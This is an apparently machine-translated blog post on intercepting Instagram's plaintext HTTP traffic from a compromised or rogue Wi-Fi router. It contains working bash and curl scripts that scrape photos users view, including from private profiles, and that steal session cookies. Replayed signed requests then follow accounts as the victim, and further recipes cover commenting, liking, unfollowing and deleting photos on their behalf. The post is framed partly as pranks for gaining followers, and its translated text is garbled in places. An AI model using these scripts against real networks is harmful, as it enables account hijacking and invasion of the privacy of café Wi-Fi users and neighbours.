How to instagramm in black or watch for cookies

Hey, name, guess the riddle! What startup was sold in 2012 for a billion dollars? In which regular social network did our reserve president get fleas last year? What social network has tried to declare the content generated by the user as its property?

Yeah, right! Today we talk about Instagram .
')
With all the media attention to Instagram, I have never met the security analysis of this project, and there is something to analyze. Instagram communicates via open http (!) And if it sometimes uses cryptography, it is a very strange way.

Many details and cool DIY hack under the cut.

Research platform

As a testing ground for all my experiments, my home router Asus rt-n56u with Padavan custom firmware and Entware repository will act. This choice was made intentionally. The result of my digging was a few bash scripts (which I will share below), which can completely autonomously perform some of the things described below without attracting much attention to themselves.

In addition, the router emulates free wifi internet: this is exactly what can be in your favorite cafe or at your cunning neighbor.

Traffic on the router was going to a network folder using tcpdump

tcpdump –i br0 src <ip > and port 80 –w /opt/tmp/dump.dmp

And went through the network folder in Wireshark on the PC. To restore the http dialogue between the client and the server is very convenient using the “Follow TCP Stream” function.



To generate my own test POST and GET requests to Instagram servers, I used the convenient plugin for FF - HttpRequester.



Instagram also has a free open API for third-party developers, which works via https (!), But has a number of limitations, the main of which is the lack of the ability to publish an instagram. I strongly advise you to pick up on developer api ! Fun stuff ...

Information Exchange Protocol

All communication between the client and the server (except for authentication) occurs in the clear form using POST and GET requests.



Recently, in order to enhance security, a signed__ function has been added to the protocol, which returns the clever HMAC SHA256 hash of the parameter passed to it and places it in the POST request in place with the parameter itself (see screenshot).

Unfortunately, I never managed to solve the hash generation algorithm before Java ate my brain. Tugged out Androids apk function along with a fixed secret key, I uploaded to pastebin for the curious. If someone can solve it, please share it.

The main drawback of the signature_ signed signature procedure is the small set of variables in the hashed string. For example, a signed signed_body comment will approach any instagram on behalf of any user ; and in order to make a photo or delete it, you will need the same control media_id hash.
Consider now the most frequent options for POST requests to the server:

### action ############# URL ######################## signed_body ### parameter
Fold up / api / v1 / friendships / create (destroy) / {user_id} / user_id
Comment / api / v1 / media / {media_id} / comment / comment_text
Delete comment / api / v1 / media / {media_id} / comment / {comment_id} / delete / comment_id, media_id
Like (unlock) / api / v1 / media / {media_id} / like (unlike) / media_id
Delete / api / v1 / media / {media_id} / delete / media_id
Media_id is configured as photo_id + ”_” + user_id.

Application Methods

All of the attacks described below are based on the assumption that you have access to the router, or at least network traffic (for example, using passive lan tap ).
Let's start with the fact that we will automatically download all published and viewed photos of the user (including from closed profiles).

 #!/bin/bash while true do tcpdump -i br0 port 80 -nn -w - | grep -m 1 -A 1 _7.jpg | awk '{one =$2 ; getline ; print "http://" $2 one ; getline}'| xargs wget -P /opt/tmp/photo done 

We catch requests for files _7.jpg in all GET traffic (this is how all large-sized instagrams end up) and feed them to wget. Photos will appear in the photo folder in real time.

Autofollow

Now let's log your account on behalf of the user. For this we need only flying user defenseless cookies :)

 /opt/home/admin # COOKIE=`tcpdump -i br0 port 80 -nn -w - |grep -m 1 ds_user_id= | awk '{print $2$3$4$5}'` /opt/tmp/curl_follow.sh 

We catch all flying http traffic. We catch custom cookies and slightly comb them. Then we give the script curl_follow.sh

 /opt/home/admin # cat /opt/tmp/curl_follow.sh #! /bin/bash curl -X POST \ -H "Connection: Keep-Alive" \ --user-agent "Instagram 3.4.0 Android (17/4.2.1; 240dpi; 480x800; samsung/Samsung; GT-I9100; GT-I9100; smdk4210; en_US)" \ -b $COOKIE \ -d signed_body=08501f85a71be55abfa0d36719f72a27debb2ee769fd2f4ffe086c07ae129f6a.%7B%22user_id%22%3A%2237343536%22%7D&ig_sig_key_version=4" \ instagram.com/api/v1/friendships/create/37343536/ 

The beauty of this scenario is the ability to work autonomously on the router without human intervention. Set up, run and admire the growing counter of their followers.

What else can you do?

Leave comments to any pictures on behalf of the user.

1. Preheniruyuem the necessary comment from your account on your phone to any instagram;
2. We will catch and copy the data field signed_ package POST;
3. Build your package from the user's cookie, our signed_body and the desired media_id.

Like certain instagram on behalf of user

1. Pregenerate the signed_body with the desired media_id;
2. We catch the user's cookie;
3. We do everything the same as in the example with following.

You can, of course, use these dark tricks:

Disclose all friends

- get id followers, fold them from the left account, thereby recognizing signed_body user_id. To deflate on behalf of the user, using the intercepted cookie.

Delete user instagrams

- get the list of the user's media_id, polaykat on behalf of a third-party account, thereby obtaining a signed_body media_id, delete using the user's cookie.

Instead of conclusions and conclusions, a small video demonstration: